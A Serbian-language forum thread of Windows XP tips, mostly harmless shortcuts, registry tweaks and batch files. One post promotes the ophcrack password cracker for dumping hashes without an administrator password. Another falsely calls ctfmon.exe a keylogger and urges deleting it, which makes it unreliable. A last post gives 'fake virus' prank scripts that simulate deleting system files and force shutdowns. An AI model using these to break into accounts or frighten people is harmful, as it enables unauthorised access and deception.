TECHNO ZONE => Raèunari i Internet => : flip 07 April, 2007, 09:28:27 AM: Winows tricks
: flip 07 April, 2007, 09:28:27 AM

!!evo jedne teme gde bi svako ko zna neki trik vezano za windows trebalo da ga podeli sa svima !!!: ophcrack [BEST PROGRAM]
: Sale-X 07 April, 2007, 10:41:02 AM
ophcrack [BEST PROGRAM]

A Windows password cracker based on the faster time-memory trade-off using rainbow tables

Ophcrack 2.1 uses the same table sets as Ophcrack 1.0. This means that it cracks 99.9% of passwords of length 1 to 14 containing uppercase letters, lowercase letters and numbers.
The interface allows for three ways of dumping password hashes:

encrypted SAM: dumps the hashes from the SAM and SYSTEM files retrieved from a Windows machine while booting on another disk. Note that in this case you do not need to know a Windows administrator password to get the hashes.
local SAM (only for the Windows version of Ophcrack 2.1): dumps the hashes from the Windows machine the program is running on. You need to be administrator of your local machine for this to work.
remote SAM (only for the Windows version of Ophcrack 2.1): dumps the hashes of a remote Windows machine, provided you know the username and password of an administrator and the name of a share.

How to Run? :
1-Burn the file on a CD
2-Boot the computer from CD
3-Follow the instruction
4-your done Congratulation
password consist of 14 letter is done within 7 min. Sure it might take longer
if the password contain: $&^#@*....ect

Download:
:

http://belnet.dl.sourceforge.net/sourceforge/ophcrack/ophcrack-livecd-0.9a.iso

ili

http://www.megaupload.com/?d=94G848OZ


password: devil

more info: http://ophcrack.sourceforge.net


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:46:01 AM
Ovdje vam predstavljamo neke "fore" u windows-u koje mnogo olakšavaju rad. Veæina od vas ovo veæ zna, ali zbog onih koji ne znaju bolje je da ih pokažemo ("Print Screen", "Ctrl + ...","Alt+Tab","Save Picture/Target As","Ctrl+Alt+Del").

Print Screen Function
   
    Pritisnite "Print Screen" dugme u desnom gornjem dijelu tastature da snimite sve ono što se trenutno nalazi na vašem ekranu. Na primer, pritisnite dugme baš sad (ništa se neæe desiti), ali otvorite Microsoft Word i idite na 'Edit->Paste' i vidjeæete da ste kopirali sliku ekrana koja je bila u trenutku pritiska na gore pomenuto dugme.
    U redu, to ste možda veæ znali, ali probajte kombinaciju Alt+Print Screen. Iskopiraæete trenutno aktivni prozor, a ne cijeli ekran.
    Ovo je veoma korisno za pravljenje uputstava ili objašnjenja, da pokažete ljudima kako da nešto urade na raèunaru.

Ctrl + ......

Ctrl+C - "Copy" - kopira ono što ste oznaèili (selektovali)
Ctrl+V - "Paste" - prikazuje ono što ste kopirali
Ctrl+X - "Cut" - briše ono što ste oznaèili ali ga i kopira
Ctrl+S - "Save" - preèica da se saèuva dokument ili bilo šta drugo

Alt+Tab

    Držeæi Alt dugme pritiskajte Tab da prelazite sa jednog na drugi program koji su vam otvoreni.


Save Picture/Target As...

    Desni klik mišem na bilo koju (uglavnom) sliku na internetu i odaberete Save Picture As da bi je saèuvali na vašem raèunaru.
    Desni klik mišem na fajl (mp3,mpeg) na internetu i odaberete Save Target As da bi ga saèuvali na vašem raèunaru.

Ctrl+Alt+Del

    Ako ne znate šta drugo da uradite a raèunar vam je "zakoèio" pritisnite Ctrl+Alt+Del da bi ili restartovali raèunar ili ugasili program koji vam pravi problem.


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:46:26 AM
Print Screen Function
   
    Pritisnite "Print Screen" dugme u desnom gornjem dijelu tastature da snimite sve ono što se trenutno nalazi na vašem ekranu. Na primer, pritisnite dugme baš sad (ništa se neæe desiti), ali otvorite Microsoft Word i idite na 'Edit->Paste' i vidjeæete da ste kopirali sliku ekrana koja je bila u trenutku pritiska na gore pomenuto dugme.
    U redu, to ste možda veæ znali, ali probajte kombinaciju Alt+Print Screen. Iskopiraæete trenutno aktivni prozor, a ne cijeli ekran.
    Ovo je veoma korisno za pravljenje uputstava ili objašnjenja, da pokažete ljudima kako da nešto urade na raèunaru.

Ctrl + ......

Ctrl+C - "Copy" - kopira ono što ste oznaèili (selektovali)
Ctrl+V - "Paste" - prikazuje ono što ste kopirali
Ctrl+X - "Cut" - briše ono što ste oznaèili ali ga i kopira
Ctrl+S - "Save" - preèica da se saèuva dokument ili bilo šta drugo

Alt+Tab

    Držeæi Alt dugme pritiskajte Tab da prelazite sa jednog na drugi program koji su vam otvoreni.


Save Picture/Target As...

    Desni klik mišem na bilo koju (uglavnom) sliku na internetu i odaberete Save Picture As da bi je saèuvali na vašem raèunaru.
    Desni klik mišem na fajl (mp3,mpeg) na internetu i odaberete Save Target As da bi ga saèuvali na vašem raèunaru.

Ctrl+Alt+Del

    Ako ne znate šta drugo da uradite a raèunar vam je "zakoèio" pritisnite Ctrl+Alt+Del da bi ili restartovali raèunar ili ugasili program koji vam pravi problem.


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:47:11 AM
Ukoliko nekog nervira što mu se na XP login screenu ne pojavljuje Administrator nego u Safe modu to može da ispravi tako što æe u Regeditu otiæi na:


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList


i dodati novu vrijednost:

Administrator, (tip kljuèa je REG_DWORD - DWORD Value), i kao vrijednost tog kljuèa staviti 1. Nakon toga, kada se ukljuèi raèunar na Login screenu æe pored obiènih accounta pojaviti i Administrator.

--------------------------------------

Ovo možete koristiti samo u sluèajevima da imate tonsko biranje. Idite na Start> Control Panel> Phone and modem options> Modems> Properties> Advanced> i u Extra settings upišite S11=60 (ili 50 ili 40) i pritisnete Apply. Što je manji broj to æe vaš modem brže pozivati, postavite prvo 60 ako radi, onda postavite 50 ako radi onda 40...itd.


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:47:31 AM
Kako napraviti ikonicu za gašenje ili restartovanje raèunara?

    Da bi kreirali ikonicu za gašenje raèunara na vašem desktop-u uradite sledeæe:

    1.Desni klik mišem na slobodni prostor vašeg desktop-a.
    2.Odaberite New/Shortcut
    3.Unesite shutdown -s -t 00
    4.Pritisnite Next
    5.Za ime stavite šta želite i pritisnite Finish.

    Da bi nepravili ikonicu za restartovanje raèunara samo umjesto shutdown -s -t 00 kucajte shutdown -r -t 00.

--------------------------------------

Kako ubrzati rad Start menija?

    Ubrzavanje rada Start menija se svodi na to da iskljuèite sjenku ispod menija:
   
    1.Desni klik mišem na slobodni prostor vašeg desktop-a
    2.Odaberite Properties
    3.Odaberite Appearance tab
    4.Kliknite na Effects dugme
    5.Odštrikirajte Show shadows under menus

--------------------------------------


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:50:48 AM
WindowsXP & Service Pack II
   
    Vjerovatno je mnogima od vas 'dojadilo' da prijateljima instalirate Windows XP, zatim sve potrebne zakrpe neprekidno mijenjajuæi CD za CD-om. Koliko ste puta postavili sebi pitanje, zašto ne bi u jednom koraku instalirali OS sa svim zakrpama? U narednim redovima æemo vam objasniti na koji naèin da napravite Bootabilni CD Windowsa XP koji æe u 'sebi' sadržati i instalaciju Service Pack-a II. Na taj naèin æe vam biti omoguæeno da jednim korakom, jednim CD-om, instaliramo OS i zakrpe za naš 'voljeni' XP.

    Download-ujte sa Microsoftovog sajta Service Pack II i smjestite ga u nekom direktorijumu na vašem raèunaru (u našem sluèaju D:\XP-SP2). Zatim iskopirajte falove Windows XP sa CD-a na vaš raèunar. Sledeæi korak je otvaranje Command Prompt-a (Start> Run > cmd), dodjite do direktorijuma u kojem ste smjestili Service pack II (cd \foldername). Kucajte komandu: servicepack filename /integrate:drive/path. U našem sluèaju komanda je: WindowsXP-KB835935-SP2-ENU /integrate:D:\XP-CD.

(http://www.bit.cg.yu/vfiles/XP_1_digital.png)

    Prvo, fajlovi æe biti ekstraktovani, nakon toga integrisani sa fajlovima Windowsa XP.

(http://www.bit.cg.yu/vfiles/XP_2_digital.png)

(http://www.bit.cg.yu/vfiles/XP_3_digital.png)

    Pravljenje Bootabilnog CD-a

    Za ovu priliku smo koristili softvere: ISO Buster i Nero 6. Startujte ekstraktovanje fajlova sa diska sa instalacijom XP. Koristeæi ISO Buster, izaberemo 'folder' Bootable CD i desnim klikom Microsoft Corporation.img. Iz padajuæeg menija izaberemo Extract Microsoft Corporation.img, i ekstraktujemo u folder na našem disku gdje smo snimili fajlove Windows XP (u našem sluèaju D:\XP-CD).

(http://www.bit.cg.yu/vfiles/XP_4_digital.png)

    Zatim, startujemo naš Nero, birajuæi CD-ROM (Boot). Podesimo opcije kao što su prikazane na slici:

(http://www.bit.cg.yu/vfiles/XP_5_digital.png)

    ISO odjeljak treba konfigurisati kao što je prikazano na slici:

(http://www.bit.cg.yu/vfiles/XP_6_digital.png)

  Ukoliko imate stariju verziju Nera neæete imati opciju Do Not Add ";1" ISO file version extention under Relax ISO Restrictions. Zbog toga vam preporuèujemo da na raèunarima imate novije verzije Nera.

    Sada možemo podesiti i odjeljak Label

• Windows XP Professional: WXPCCP_EN
• Windows XP Home: WXHCCP_EN
• Windows XP Professional OEM: WXPOEM_EN
• Windows XP Home OEM: WXHOEM_EN

(http://www.bit.cg.yu/vfiles/XP_7_digital.png)

    Izaberite New, i u File Browser-u selektujte fajlove i foldere (u našem sluèaju D:\XP-CD).

(http://www.bit.cg.yu/vfiles/XP_8_digital.png)

    Sada su se stekli uslovi za prženje željenog CD-a

(http://www.bit.cg.yu/vfiles/XP_9_digital.png)


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:51:47 AM
Želite da odštampate sadržaj nekog direktorijuma (npr. MP3 muzike), a ne znate kako? Dovoljno je jednom ovo da uradite i svako naredno štampanje biæe dva put klik mišem na željeni direktorijum.

Prvo treba otkucati u notepadu sledeæe:

  @echo off
  dir %1 /o:g > c:\directory.txt
  start /w notepad /p c:\directory.txt
  del c:\directory.txt
  exit

i saèuvati taj fajl u C:\WINDOWS pod imenom npr. print_directory.bat.

I pola posla je završeno!

Sada to treba dodati na desni klik miša:

1.Otvorite My Computer
2.Idite na Tools \ Folder Options
3.Sada otvorite File Types tab
4.Pronaðite File Folder
5.Kliknite na Advanced
6.Na novom prozoru kliknite New
7.U Action polju ukucajte npr. "Štampaj Direktorijum" a u Application used to perform action naðite fajl koji ste kreirali.
8.Potvrdite sve što ste uradili

(http://www.bit.cg.yu/vfiles/stampaj_direktorijum_digital.jpg)

    Nekada poslije dodavanja na desni klik miša dolazi do promjene default-ne vrijednosti za otvaranje foldera. Da bi ispravili ovo uradite sledeæe:

1.Idite na Start \ Run
2.Kucajte regedit i pritisnite OK
3.Idite na HKEY_CLASSES_ROOT \ Directory \ shell
4.Kliknite dva puta na (Default) i unesite vrijednost none ili explorer
5.Pritisnite OK i zatvorite prozor.

Posao je obavljen. Prikljuèite štampaè i isprobajte vašu novu opciju.


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:52:09 AM
Ukoliko vam se XP sporije gasi i imate NVIDIA-u karticu, gašenje raèunara možete ubrzati ukoliko uradite par sledeæih koraka:

    • birajte Control Panel,
    • Administrative Tools,
    • Services

    Kliknite desnim dugmetom miša na NVIDIA Driver Helper Service i izaberite Stop. Da Vam se nebi podizao driver sa Windowsom birajte properties na driver-u i startup type izaberite Manual.

--------------------------------------

Ukoliko vam raèunar uspori prenos informacija sa CD na HDD ili sa jedne particije na drugu i tu ima rešenja.

    • Control panel,
    • Sistem,
    • Hardvare,
    • Device manager,
    • oznacimo IDE IDE ATA/ ATAPI controlers.
    • Advanced options za obe opcije, promeniti PIO u DMA mod.

--------------------------------------

    Da li vas nervira što WinAmp, u novijim verzijama, ne briše Playlist-u, pa tako kada želimo da èujemo neku muzièku numeru iz npr. Explorera, on nam prvo pusti sve redom pjesme iz Playliste pa tek na kraju našu pjesmu? Postoji jednostavno rješenje za ovaj problem a to je prvo izbrišemo sve pjesme iz Playlist-e a nakon, sa Explorer-om, ‘odemo’ u folder gdje je WinAmp instaliran i pronadjemo fajl sa imenom WINAMP.M3U. Kliknite desnim dugmetom na njega i izaberite opciju Properties i otkaèite Read-Only. Od sada, Winamp neæe moæi da snima Playlistu što znaèi da æe odmah pustiti vašu pjesmu.

--------------------------------------


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:54:08 AM
Kako promijeniti "Start" dugme
   
    Kako promijeniti natpis na Windows-ovom "Start" dugmetu. Kako promijeniti tekst koji se pojavljuje držanjem miša na "Start" dugmetu? Kako promijeniti slièicu na "Start" dugmetu?

(http://www.bit.cg.yu/images/winstart_digital.JPG)

1. Prvo vam treba program Resource Hacker.
2. Iskopirajte fajl explorer.exe iz C:\WINDOWS na vaš desktop.
3. Preimenujte ga u explorer1.exe
4. Pokrenite program Resource Hacker i otvorite sa njim fajl explorer1.exe.
5. Za promjenu natpisa na Start dugmetu otvorite String Table \ 37 i kliknite na 1033. Na desnoj strani æe vam se pojaviti tekst.
6. Naðite gdje piše start i ukucajte šta želite umjesto toga. Može i više rijeèi, a dužina rijeèi nije bitna. Kliknite Compile Script.

(http://www.bit.cg.yu/vfiles/rh1_digital.JPG)

    Ukoliko želite da promjenite i "Alt Tekst" na dugmetu kao i slièicu uradite i par sledeæih koraka:

  7. Za promjenu "Alt Teksta" otvorite String Table \ 38 i kliknite na 1033. Na desnoj strani naðite gdje piše Click here to begin i ukucajte tu šta želite. Kliknite Compile Script.
 
(http://www.bit.cg.yu/vfiles/rh2_digital.JPG)

  8. Za promjenu slièice idite na Bitmap \ 143 i kliknite na 1033

(http://www.bit.cg.yu/vfiles/rh3_digital.JPG)

  9. Idite na Action \ Replace Bitmap pri vrhu programa pa onda Open file with new bitmap.... Pronaðite bitmap slièicu koju želite da stavite i kliknite Replace.
  10. Saèuvajte fajl u C:\WINDOWS kao explorer1.exe a potom fajl na desktopu obrišite.
 
Napomena:

    Pri mjenjanju teksta ne brisati znake navoda!

Još nekoliko koraka:

  11. Idite na Start \ Run , kucajte regedit i pritisnite OK.
  12. Idite na HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon
  13. Naðite na desnoj strani naziv Shell (pored piše explorer.exe) i kliknite dva puta na njega

(http://www.bit.cg.yu/vfiles/rh4_digital.JPG)

  14. Otvara vam se prozor gdje umjesto explorer.exe unosite explorer1.exe. Pritisnite OK.

(http://www.bit.cg.yu/vfiles/rh5_digital.JPG)

To je to. Restartujte raèunar i pogledajte rezultat vašeg rada :)


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:55:08 AM
Kako iskljuèiti funkciju Windows dugmetu na tastaturi? Kako još otvoriti Windows Task Manager sem sa Ctrl-Alt-Del? Koja je preèica na tastaturi za minimiziranje svih prozora?

Kako iskljuèiti funkciju Windows dugmetu na tastaturi?

1. Startujte regedit na ranije opisani naèin.
2. Idite na HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Keyboard Layout
3. Sada idite na Edit -> New -> Binary Value
4. Kao ime stavite Scancode Map
5. Kliknite 2 puta na njega i unesite sledeæe:

0000 0000 0000 0000
0300 0000 0000 5BE0
0000 5CE0 0000 0000


6. Restartujte raèunar.


Kako još otvoriti Windows Task Manager sem sa Ctrl-Alt-Del?

Koristite preèicu Ctrl-Shift-Esc.


Koja je preèica na tastaturi za minimiziranje svih prozora?

1. Pritisnite prvo Ctrl-Esc
2. Pritisnite Alt-M


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:55:53 AM
Ako želite da obrišete listu najèešæe otvaranih dokumenata u Windowsu XP to možete uraditi na sledeæe naèine u zavisnosti da li vam je ukljuèen Start menu ili Classic Start menu.


Ako vam je ukljuèen Start menu uradite sledeæe:

1. Otvorite Control Panel i otvorite ikonicu Taskbar and Start Menu
2. Odaberite tab Start Menu i kliknite na Customize
3. Kliknite na Advanced i da bi obrisali listu kliknite na Clear List. Tu možete i odabrati da li želite da vam se ubuduæe formira ta lista na List my most recently opened documents


Ako vam je ukljuèen Classic Start menu uradite sledeæe:

1. i 2. korak su isti
3. Za brisanje liste kliknite na dugme Clear


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:56:14 AM
Promijenite velièinu scrollbar-a. Napravite preèicu na vašem desktop-u za kreiranje novog e-mail-a. Kako da "pokupite" link na koji vodi neki tekst ili slièica?

Promjenite velièinu scrollbar-a

1. Desni klik mišem na prazno mjesto na desktop-u
2. Odaberite Properties
3. Idite na tab Appearance pa na dugme Advanced
4. U opadajuæem meniju odaberite Scrollbar
5. Poveæajte ili smanjite velièinu na size.


Napravite preèicu na vašem desktop-u za kreiranje novog e-mail-a

1. Desni klik mišem na prazno mjesto na desktop-u
2. Odaberite New -> Shortcut
3. Kucajte mailto:
4. Kliknite na Next i potom kucajte npr. Novi mail
5. Kliknite na Finish


Kako da "pokupite" link na koji vodi neki tekst ili slièica?

1. Desni klik mišem na željeni tekst ili slièicu koji je linkovan.
2. Odaberite Copy Shortcut

Sada možete uraditi negdje Ctrl + V gdje želite da vam se iskopira link.


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:56:41 AM
Kako napraviti da kursor ne blinka u aplikacijama (npr. Word)? Thumbs.db fajlovi - šta su i kako onemoguæiti njihovo kreiranje?


Kako napraviti da kursor ne blinka u aplikacijama (npr. Word)?

1. Startujte Registry Editor (Start -> Run -> regedit)
2. Idite na HKEY_CURRENT_USER \ Control Panel \ Desktop
3. Ukoliko ne postoji CursorBlinkRate na desnoj strani kliknite desnim dugmetom miša na desni dio Registry Editora i odaberite New -> String Value (ukoliko postoji preskoèite korake 3 i 4)
4. Dajte mu ime CursorBlinkRate.
5. Sada kliknite dva puta na to da bi se otvorio prozor za unos vrijednosti. Dajte mu vrijednost -1 .
6. Restartujte raèunar.


Thumbs.db fajlovi - šta su i kako onemoguæiti njihovo kreiranje?

Kad pregledavate foldere u Windows-u XP sa takozvanim thumbnails pogledom (View \ Thumbnails) on kreira thumbs.db fajlove. On tu "kešira" slike iz datog foldera. Ako želite da iskljuèite ovu opciju i saèuvate malo prostora na disku uradite sljedeæe:

1. Otvorite My Computer
2. Idite na Tools \ Folder Options i odaberite tab View
3. U prvom dijelu pod Files and Folders èekirajte opciju Do not cache thumbnails
4. Sada možete pretražiti na disku fajlove thumbs.db i sve ih obrisati. Nijedan više neæe biti kreiran.


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:57:06 AM
kako da promijenite "naslov" vаšeg browsera (Internet Explorer) i šta da uradite da bi lakše provjeravali vašu IP adresu.


Kako promijeniti naslov Internet Explorera?

1. Idite na Start -> Run -> kucajte gpedit.msc -> OK
2. Idite na User Configuration -> Windows Setting -> Internet Explorer Maintenance -> Browser User Interface
3. Kliknite dva puta na Browser Title
4. Èekirajte Customize Title Bars
5. Unesite tu šta želite
6. Pritisnite OK

Otvorite Internet Explorer i pogledajte šta ste uradili :).


Šta uraditi da bi lakše provjeravali vašu IP adresu?

Otkucajte u Notepad-u sledeæe:

    @echo.
    @ipconfig | find "IP Address"
    @echo.
    @pause

i saèuvajte to kao ip.bat fajl. Snimite ga u direktorijum C:/Windows.

Sada kada želite da saznate vašu IP adresu samo u Start -> Run kucate ip i ispisaæe vam se vaša IP adresa u sledeæem obliku:

    IP Address. . . . . . . . . . . . : x.x.x.x

    Press any key to continue . . .


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:57:28 AM
Poveæajte brzinu mrežne komunikacije
   
    Da li vaš raèunar usporava kada želite da se konektujete na druge raèunare sa kojima ste u mreži i sa kojih želite da preuzmete podatke? Jedan od osnovnih razloga tome je osobina Windows Explorera da traži listu zadataka na udaljenom raèunaru kojem pristupate. Ovo zaista može da uspori raèunar i da vam "zamrzne" prozor dok èekate odgovor od udaljenog raèunara. Ovo je vrlo kompleksan problem, ali je rješenje veoma jednostavno.


    Umjesto da èekate informaciju o listi zadataka na udaljenom raèunaru, koja je za vas potpuno nepotrebna, možete iskljuèiti ovu opciju.

Uradite sledeæe:

1. Idite na Start -> Run, ukucajte regedit i pritisnite OK.

2. Kada vam se otvori Registry Editor idite na HKEY_LOCAL_MACHINE -> Software -> Microsoft -> Windows -> CurrentVersion -> Explorer -> RemoteComputer -> NameSpace

3. U NameSpace folderu imate dva unosa. Jedan je "{2227A280-3AEA-1069-A2DE-08002B30309D}" koji govori Exploreru da pokazuje štampaèe na udaljenom raèunaru koji su share-ovani, a drugi je "{D6277990-4C6A-11CF-8D87-00AA0060F5BF}" koji govori Exploreru da prikaže listu zadataka sa udaljenog raèunara. Sve što treba da uradite je desni klik mišem na ovaj drugi unos i pritisnite Delete.

4. Restartujte raèunar i to je to!


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:57:46 AM
Kako da dodate Adress bar na vašem taskbaru? Kako da napravite screen saver koji æe da lista one slike koje vi odaberte?

Kako da dodate Adress bar na vašem taskbaru?

1. Desni klik mišem na taskbar, odaberite Toolbars, i kliknite na Address.
2. Rijeè Address æe se pojaviti na vašem taskbar-u.
3. Dupli klik mišem na nju da bi pristupili Adress bar-u.
4. Ako ne radi vaš taskbar je zakljuèan. Možete ga otkljuèati tako što æete kliknuti desnim tasterom miša na taskbar i odèekirati opciju Lock the Taskbar.


Kako da napravite screen saver koji æe da lista one slike koje vi odaberte?

1. Kliknite desnim dugmetom miša na prazno mjesto na desktop-u i odaberite Properties.
2. Kliknite na Screen Saver tab.
3. Iz Screensaver opadajuæeg menija odaberite My Pictures Slideshow.
4. Kliknite Settings a potom Browse da bi odabrali direktorijum iz kojeg æe raèunar da "vuèe" slike.


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:58:06 AM
Kako da na vašem Taskbar-u napravite preèicu za željeni direktorijum? Kako da u vašem XP Windows-u promjenite vrijeme na Taskbar-u u 24-èasovno?

Kako da na vašem Taskbar-u napravite preèicu za željeni direktorijum?

1.Kliknite lijevim dugmetom miša na vaš Taskbar.
2.Odaberite Toolbar -> New Toolbar...
3.Odaberite direktorijum i pritisnite OK.Kako da u vašem XP Windows-u promjenite vrijeme na Taskbar-u u 24-èasovno?

1.Idite na Control Panel -> Regional and Language Options
2.U gornjem opadajuæem meniju odaberite Serbian (Latin).

Ovim æete, pored vrmena u 24-èasovno, promijeniti i ispis datuma na naš jezik.


Ako ne želite da mijenjate datum na naš jezik umjesto ovoga uradite sledeæe:

1.Idite na Control Panel -> Regional and Language Options
2.Kliknite na Customize... i idite na Time tab.
3.Na Time format unesite H (veliko) umjesto h (malo)


: Odg: Winows tricks
: Sale-X 07 April, 2007, 10:58:23 AM
Ako vas, kao što je i mene, nervira grupisanjne istih 'prozora' kada na Taskbaru nema dovoljno mjesta (a inaše može da se poreða 5 ili 6) evo vašeg izbavljenja:
    Desnim dugmetom kliknite na Taskbar, odaberite Properties i uklonite štrik iz kvadratiæa Group Similar Taskbar Buttons.


    U Windows-u radi sigurnosti neki fajlovi i folderi imaju opciju po defaultu da se ne vide u Windowsu (hidden). Mi to možemo mijenjati i na našima fajlovima i folderima u Propertiesu. A evo šta da uradite da bi se svi 'sakriveni' fajlovi pokazali:
    Otvorite bilo koji Windows navigacioni prozor, odaberite pri vrhu Tools->Folder options->View a zatim dolje u Advanced Settings 'èekirajte' Show Hidden Files And Folders.
    Oni fajlovi koji su Hidden izgledaæe u windowsu kao zamagljeni.


    Evo još jednog olakšanja koje æe odlièno doæi mnogima, a to je postavljanje željenog direktorijuma u Send To kao opciju:
    Otvorite C:/Documants and Settings, uðite u direktorijum vašeg Account-a, onda u skriveni (Hidden) direktorijum SendTo i u njega snimite Shortcut željenog foldera.
    Kada kliknete desnim dugmetom miša na bilo koji fajl na kompu i odaberete vaš folder iz Send To, fajl æe odmah biti kopiran.(mnogo korisno kod rašèišæavanja desktopa)


: Odg: Winows tricks
: Sk84life 24 April, 2007, 02:25:06 PM
Kako da fajl ostane bez imena.
Kad rinejmujete fajl izbrisite ime fajla i ukucajte novo ime drzeci ALT i na numerickoj tastaturi 0160.


: Odg: Winows tricks
: dzonson 01 May, 2007, 02:20:08 PM
(http://img352.imageshack.us/img352/1507/wintriks1fo0zo5.gif)
(http://img352.imageshack.us/img352/1955/wintricksslf5xy9.jpg)

Program je besplatan,a možete ga pogledati i skinuti noviju verziju sa ove adrese:

http://www.wintips-inc.com/


: Odg: Winows tricks
: JAKUZZA 28 March, 2008, 06:33:32 PM
Uklanjanje vizualnih efekata takodje ce osloboditi deo raspoložive memorije.   
Idite u ''Settings - Control Panel - System - Advanced'' i pod stavkom ''Performance'' kliknite na dugme ''Settings'' i u prozoru ''Visual Effects'' ostavite kvacice samo na "Use drop shadows… i Use visual styles…" ,sad kliknite na ''Advanced'' i pod opcijom ''Memory usage'' oznacite ''Programs'', zatim kliknite ''Apply'' i sve je ostalo isto, a vaš racunar radi brže...Neke stvari u ''Visual Effects'' odaberite sami ,neke su potrebne neke nisu...


: Odg: Winows tricks
: JAKUZZA 28 March, 2008, 06:37:00 PM
XP na krilima
Brzi i žestoki

Ovu promenu mogu izvesti svi korisnici Windows XP operativnog sistema, ali zbog izuzetne potrebe za memorijom njen ucinak nece biti vidljiv kao ubrzanje, raspolažete li sa manje od 256 MB radne memorije.
 
DisablePagingExecutive - ukljucivanjem ove opcije sprecavate cuvanje odredjenih aplikacija na hard disk vašeg racunara. Sa tim cete znatno ubrzati sve procese, jer poznato je da radna memorija i hiljadu puta brža od virtualne na hard disku. Vrednost ove opcije je 0, da bi je ukljucili postavite je na 1.
 
Ovu postavku nalazite na sledecem mestu u registry editoru: HKEY_LOCAL_MACHINE  - System -CurrentControlSet -  Control -  SessionManager -  Memory Management.
 
Sledeca opcija koju nalazite odmah do pre spomenute je: LargeSystemCache. Kada ukljucite ovu opciju, "prisiljavate" ucitavanje operativnog sistema i njegovih procesa u memoriju.
 
S ovom promenom Windows XP ucitava jezgro operativnog sistema i drži ga u memoriji, cineci celokupni sistem mnogo bržim i življim za rad.


: Odg: Winows tricks
: JAKUZZA 28 March, 2008, 07:58:08 PM
Za ubrzavanje menija i program liste u Start-u i funkcija na desnom kliku, mozete izmeniti vreme za koje se meni prikazuje i prelistava i samo prikazivanje podmenija.Ovu postavku nalazite na sledecem mestu, u registry editoru:HKEY_CURRENT_USER -> Desktop -> sa desne strane imate stavku ''MenuShowDelay'' ,idite desnim klikom na ''Modify'' i datu vrednost ''Value data'' koja je uglavnom 400 promenite u 1 ili cak u 0.Zatim idite na OK . Samim tim je posao zavrsen.Videcete kako je meni puno puno brzi :)


: Odg: Winows tricks
: M4K1 20 December, 2008, 10:28:03 PM
► Simboli ☼♫☻♦◘•♠☻♥█▓▒░ ▄
http://new.wauseon.k12.oh.us/District/TechHelp/ALTchrc.gif (http://new.wauseon.k12.oh.us/District/TechHelp/ALTchrc.gif)


ctfmon.exe - èuo sam da, sve što se kuca na tastaturi, taj fajl to kopira i šalje negde na netu! To uglavnom hakeri znaju gde... iz bezbednosnih razloga preporuèuje se da se to iskljuèi preko:

Start → Run → ukucati msconfig → OK → Startup
(http://www.howtogeek.com/wp-content/uploads/2007/10/image32.png)
OK → restartuj komp

i obrisati taj fajl iz: C:\windows\system32\ctfmon.exe


► ako ikonicu "Show Desktop" sluèajno obrišete, a nema je ni u C:\Wndows\, može da se kreira:

1. Click Start , click Run, type notepad, and then click OK.
2. In Notepad, type the following text on individual lines:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

3. On the File menu, click Save As, and then save the file to your desktop as Show Desktop.scf.


: Odg: Winows tricks
: M4K1 12 January, 2009, 08:36:52 PM
How to Create a Fake and Harmless Virus

• Right-click on your desktop, go to "new" and click "Create Shortcut"
-A window will come up. Where it says "Location" enter: shutdown -s -t
-The rest of the location is customizable. After the -t, press space and enter the amount of time you want someone to have until shutdown in seconds with only numbers when virus is activated. Press space and enter -c then another space and in quotations, type in a comment that will appear when the computer is shutting down. Click "Next". (example: shutdown -s -t 10 -c "WARNING: VIRUS DETECTED. BEGIN SHUTDOWN")
-On the next screen, name your virus whatever you want, it will still have the same effect. Click "OK".
-Your fake virus will be on your desktop as whatever you named it. Click to activate it. If done correctly a shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.
-TO ABORT THE FAKE VIRUS YOU MUST click the Start button on your taskbar and click run. Then type in: shutdown -a

• Heres another way to make a virus, it's completely harmless, all it does is create a folder in your all programs menu and shutdown your pc =) Open notepad and save as whatever.bat:
:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!<brstart /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
